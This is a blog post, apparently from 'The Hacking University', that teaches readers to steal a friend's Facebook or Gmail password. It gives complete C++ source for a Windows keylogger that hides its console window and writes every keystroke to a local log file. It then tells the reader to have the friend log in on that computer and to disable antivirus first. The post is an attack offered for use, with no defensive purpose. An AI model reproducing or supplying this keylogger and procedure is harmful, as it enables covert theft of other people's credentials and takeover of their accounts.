Hack " Facebook,Gmail,Google+ " Account of Your Friend | by The Hacking University


By on 19:28

Hello !
Everyone want to know password of friend's Facebook ,Gmail account, But ,How is it possible ?
We do not know any programming language and without programming language , it is not possible.I am telling you a trick here .After it, you can know easily password of your friend.But,here is one condition and what is that ?
Condition is that your friend login in his Facebook account only in your computer.If it is possible then you can know password of his Facebook,Gmail account.

I am posting a simple programme of keylogger .Programme is Given below-

First ,open any compiler of C++ programming language and then copy-paste programme given below.



#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}


Now compile and save this programme as " Keylogger " without quotes. Now run the programme.. A  'Log.text' file is created auotomatically in same folder where you have saved 'Keylogger'.You can open it to see you computer's keyboard input.when your friend login in his facebook,Gmail account in your computer ,password is saved in Log.text file.You can open it to know his password.


Note-Your computer antivirus must be disabled.




Anil Maharda
Post: Hack " Facebook,Gmail,Google+ " Account of Your Friend | by The Hacking University
Update Date: 19:28 | Rating: 4.5

Comment for "Hack " Facebook,Gmail,Google+ " Account of Your Friend | by The Hacking University"

2 comments: